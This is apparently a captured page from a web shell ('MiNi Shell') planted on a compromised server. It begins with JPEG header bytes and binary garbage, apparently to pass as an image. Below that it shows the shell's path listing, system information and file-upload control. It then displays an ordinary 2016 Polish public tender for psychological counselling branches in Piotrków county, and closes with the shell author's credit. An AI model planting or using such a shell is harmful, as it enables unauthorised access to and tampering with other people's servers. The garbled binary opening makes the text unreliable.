JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/16232-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady (ADR) na potrzeby realizacji przez Powiat Piotrkowski projektu pn.:Twoje Serce Twoim Życiem-Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowanego w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa w podziale na Część I, II, III.</b><br>
<b>Numer ogłoszenia: 16232 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Piotrkowski , ul. Dąbrowskiego 7, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 732 88 00, faks 44 732 88 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-piotrkowski.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady (ADR) na potrzeby realizacji przez Powiat Piotrkowski projektu pn.:Twoje Serce Twoim Życiem-Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowanego w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa w podziale na Część I, II, III..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia.
2.Przedmiot zamówienia został podzielony na 3 części:
Lp.	Wyszczególnienie	Ilość (godz.)
Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady - ADR	216 h/ 1 ADR
1).Część I - ADR na ternie gmin:
Czarnocin, Moszczenica, Grabica Wolbórz -864 h/ 4 ADR
2).Część II ADR na ternie gmin:
Ręczno, Sulejów, Aleksandrów,  Łęki Szlacheckie -864 h/ 4 ADR
3).Część III - ADR na ternie gmin:
Gorzkowice, Wola Krzysztoporska, Rozprza -	648 h/ 3 ADR
Łącznie uruchomienie i prowadzenia 11 ADR	2 376 h/ 11 ADR
3.W ramach projektu realizowany jest program promocji zdrowego stylu życia skierowany do osób zagrożonych zapadalnością na choroby układu krążenia.
4.Akademie Dobrej Rady to jedna z form wsparcia ogólnodostępnego, która ma za zadanie zaspokojenie potrzeb psychospołecznych uczestników projektu oraz ogółu społeczności lokalnych, w tym przede wszystkim powinna:
Spowodować rozwój motywacji do zmiany,
Zapewnić pozytywne doświadczenia w relacjach międzyludzkich,
Pomóc w trudnych sytuacjach życiowych,
Umożliwić skorzystanie z profesjonalnego wsparcia w zakresie odzwyczajania się od palenia tytoniu.
5.Akademia Dobrej Rady (ADR) organizacyjnie stanowić ma formę ogólnodostępnych punktów poradnictwa i wsparcia w trudnych sytuacjach życiowych (w rozumieniu psychospołecznym).
6.Obligatoryjnie, w każdej filii Akademii Dobrej Rady będzie prowadzone poradnictwo w zakresie możliwości pozbycia się nałogu palenia. W uzasadnionych przypadkach (dla min. 7 osób) mogą zostać uruchomione grupy wsparcia dla osób chcących pozbyć się nałogu palenia tytoniu. 
7.Oprócz obligatoryjnego poradnictwa w zakresie pozbycia się nałogu palenia, przewidziane jest prowadzenie poradnictwa, głównie z udziałem psychologa, w zakresie interwencji kryzysowej.
8.Planowana częstotliwość spotkań to dyżury z psychologiem (terapeutą) trwające łącznie 4 godziny co najmniej raz w tygodniu.
9.Łącznie przez cały okres działalności ADR planowane jest zorganizowanie minimum 54 dyżurów, których łączna liczba godzin nie może być mniejsza niż 216 w każdej filii Akademii Dobrej Rady.
10.Planuje się, że w każdej z 11 gmin powiatu piotrkowskiego uruchomiona zostanie 1 filia ADR.
11.Wsparcie w ramach Akademii dedykowana jest:
dla osób, które znalazły się w grupie docelowej Programu tj. osoby w wieku 25 55 lat, korzystające ze świadczeń ośrodka pomocy społecznej z tytułu dochodu,
osób, które nie należą do grupy docelowej, ale mają problemy życiowe inne niż prawnej z zakresu przemocy domowej.
12.W celu realizacji zadania Zamawiający powierzy Wykonawcy przetwarzanie danych osobowych osób deklarujących uczestnictwo w projekcie w zakresie i celu niezbędnym do dokumentowania prowadzonej w ramach Akademii Dobrej Rady poradnictwa i wsparcia.
13.Z uwagi na fakt, że poradnictwo będzie miało charakter dobrowolny, Zamawiający zastrzega sobie prawo do zmiany (zwiększenia lub zmniejszenia) ilości godzin w ramach konsultacji indywidualnych wskazanych w zamówieniu, dlatego też podane zestawienie ilościowe nie jest wiążące dla Zamawiającego.
14.Dokumentowanie spotkań:
dla poradnictwa indywidualnego - karty, rejestr konsultacji oraz celem zachowania zasad w zakresie ochrony danych osobowych oświadczenia potwierdzające zgodę na przetwarzanie danych osobowych dla potrzeb projektu. Wzór oświadczenia dostarczy Zamawiający.
dla zajęć grupowych - Dzienniki zajęć (wg wzoru dziennika lekcyjnego) obecnościz imiennymi wpisami uczestników oraz opisem treści spotkania. Dziennik prowadzi osoba udzielająca porad i wsparcia (z zaznaczeniem osób, które grupy docelowej lub i jest w Programie).
15.Wykonawca zobowiązuje się do :
1)Prowadzenia spotkań w atrakcyjnej i ciekawej dla uczestników formie,
2)Prowadzenia odpowiedniej dokumentacji projektowej tj.: kart konsultacji indywidualnych, list obecności, kart czasu pracy, rejestrów udzielonych porad i wizyt.
3)Przedstawiania miesięcznego sprawozdania w zakresie liczby odbytych godzin
w ramach dyżurów pełnionych w ADR, liczby osób korzystających z poradnictwa
z zaznaczeniem osób spełniających kryteria grupy docelowej lub i uczestniczącychw programie badań profilaktycznych (ankietowych) w podziale na kobiety i mężczyzn oraz poszczególne akademie.
4)Stałej współpracy z Biurem Projektu oraz właściwym miejscowo dla danej ADR ośrodkiem pomocy społecznej oraz bieżącego przekazywania wszelkich informacji mających wpływ na prawidłowa realizacje powierzonego zadania.
5)Przeprowadzenia ankiet w celu zbadania nabytych umiejętności i kompetencji przez uczestników projektu oraz jakości zrealizowanej usługi i sporządzenia zbiorczego raportu końcowego ze zrealizowanych zajęć oraz rodzaju udzielonego wsparcia
w zakresie łącznej liczby odbytych godzin w ramach pełnionych dyżurów ADR, liczby osób korzystających z poradnictwa z zaznaczeniem osób spełniających kryteria grupy docelowej lub i uczestniczących w programie badań profilaktycznych (ankietowych)w podziale na kobiety i mężczyzn oraz akademie.
6)Przekazania całej dokumentacji zamawiającemu, w ciągu siedmiu dni roboczych licząc od dnia zakończenia działalności ADR w ramach zamówienia.
7)Wykonawca zobowiązuje się do zamieszczenia logotypów funduszy norweskich zgodnie z Podręcznikiem Komunikacji i Identyfikacji Wizualnej oraz Wymogami dotyczącymi informacji i promocji (załącznik nr 4 do regulacji na temat wdrażania Mechanizmu Finansowego EOG oraz Norweskiego Mechanizmu Finansowego na lata 2009-2014) dostępnym na stronie www.eog.gov.pl strony dowiedz-sie-wiecej-o-funduszach wez-udzial-w-promocji-funduszy zasady-promocji/ , w tym również na materiałach audiowizualnych.
8)Zamieszczania na przeznaczonej do tego celu tablicy informacyjnej (tablice zostaną dostarczone przez Zamawiającego) wszelkich bieżących informacji dot. działalności Akademii Dobrej Rady w miejscu jej działalności.
9)Zamawiający zastrzega sobie możliwość bieżącego monitorowania przebiegu prowadzonych spotkań i konsultacji w trakcie ich trwania , mającego na celu sprawdzenie prawidłowości realizacji przedmiotu zamówienia.
10)Godzina spotkań w ramach prowadzonych dyżurów (zajęć) oznacza 60 minut.
11)Wykonawcy są zobowiązani do starannego zapoznania się z przedmiotem zamówienia, wszystkimi czynnikami mającymi wpływ na kształtowanie się cen ofertowych oraz warunkami wykonania zamówienia.
12)Wykonawca oświadczy, iż posiada kwalifikacje lub /i dysponuje lub będzie dysponować zespołem osób posiadających poniższe kwalifikacje:
a)Kryteria obowiązkowe:
posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
uzyskały w polskiej uczelni dyplom magistra psychologii lub uzyskały za granicą wykształcenie uznane za równorzędne w Rzeczpospolitej Polskiej, lub uzyskały tytuł magistra na innym kierunku niż psychologia i jednocześnie posiadają kwalifikacje uprawniające je do prowadzenie terapii oraz minimum 3 letnie doświadczenie w pracy terapeutycznej lub /i poradnictwie specjalistycznym lub/i prewencji zachowań prozdrowotnych;
posiadają pełną zdolność do czynności prawnych,
władają językiem polskim w mowie i w piśmie w zakresie koniecznym do wykonywania zawodu psychologa lub/i terapeuty
b)Kryteria dodatkowe w przypadku osób z tytułem magistra psychologii:
posiadają doświadczenie w pracy terapeutycznej oraz z osobami będącymi 
w kryzysie życiowym;
posiadają dodatkowe kwalifikacje do pracy w zakresie terapii lub/ i w zakresie prewencji zachowań prozdrowotnych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt. 6)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do niniejszego postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca: a) posiada wykształcenie wyższe na kierunku  psychologia, b) uzyskał tytuł magistra na innym kierunku niż psychologia i jednocześnie posiada kwalifikacje uprawniające go do prowadzenie terapii posiada pełną zdolność do czynności prawnych, włada językiem polskim w mowie i w piśmie w zakresie koniecznym do wykonywania zawodu psychologa lub i terapeuty oraz załączy podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia. Należy przedłożyć kopie dyplomów ukończenia studiów oraz świadectw ukończenia szkoleń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca: a) posiada wykształcenie wyższe na kierunku psychologia, b) uzyskał tytuł magistra na innym kierunku niż psychologia 
i jednocześnie posiada kwalifikacje uprawniające  go do prowadzenie terapii oraz minimum 3-letnie doświadczenie w pracy terapeutycznej lub /i poradnictwie specjalistycznym lub/i prewencji zachowań prozdrowotnych, posiada pełną zdolność do czynności prawnych, włada językiem polskim w mowie i w piśmie w zakresie koniecznym do wykonywania zawodu psychologa lub i terapeuty oraz załączy podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia. Należy przedłożyć kopie dyplomów ukończenia studiów oraz świadectw ukończenia szkoleń</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie spełniony jeżeli Wykonawca dysponuje osobą, osobami z  doświadczeniem w pracy terapeutycznej lub  i poradnictwie specjalistycznym lub i prewencji zachowań prozdrowotnych oraz załączy  Wykaz osób - Załącznik nr 4 do SIWZ przewidywanych do realizacji zamówienia. Z dostarczonych dokumentów musi jednoznacznie wynikać, iż warunki Wykonawca spełnił. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-piotrkowski.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
97-300 Piotrków Trybunalski
ul. Dąbrowski 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2016 godzina 10:00, miejsce: Starostwo Powiatowe 
97-300 Piotrków Trybunalski, 
ul. Dąbrowskiego 7 
Biuro Obsługi Interesanta, I piętro, sala 112.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Twoje Serce Twoim Życiem- Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowany w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - ADR na ternie gmin:
Czarnocin, Moszczenica, Grabica Wolbórz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady - ADR - Część I - ADR na ternie gmin:
Czarnocin, Moszczenica, Grabica Wolbórz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartośc merytoryczna - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II ADR na ternie gmin:
Ręczno, Sulejów, Aleksandrów,  Łęki Szlacheckie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady - ADR - Część II ADR na ternie gmin:
Ręczno, Sulejów, Aleksandrów,  Łęki Szlacheckie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartośc merytoryczna - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - ADR na ternie gmin:
Gorzkowice, Wola Krzysztoporska, Rozprza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 11 filii poradnictwa psychologicznego i wsparcia w trudnych sytuacjach życiowych w ramach Akademii Dobrej Rady - ADR - Część III - ADR na ternie gmin:
Gorzkowice, Wola Krzysztoporska, Rozprza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość merytoryczna - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com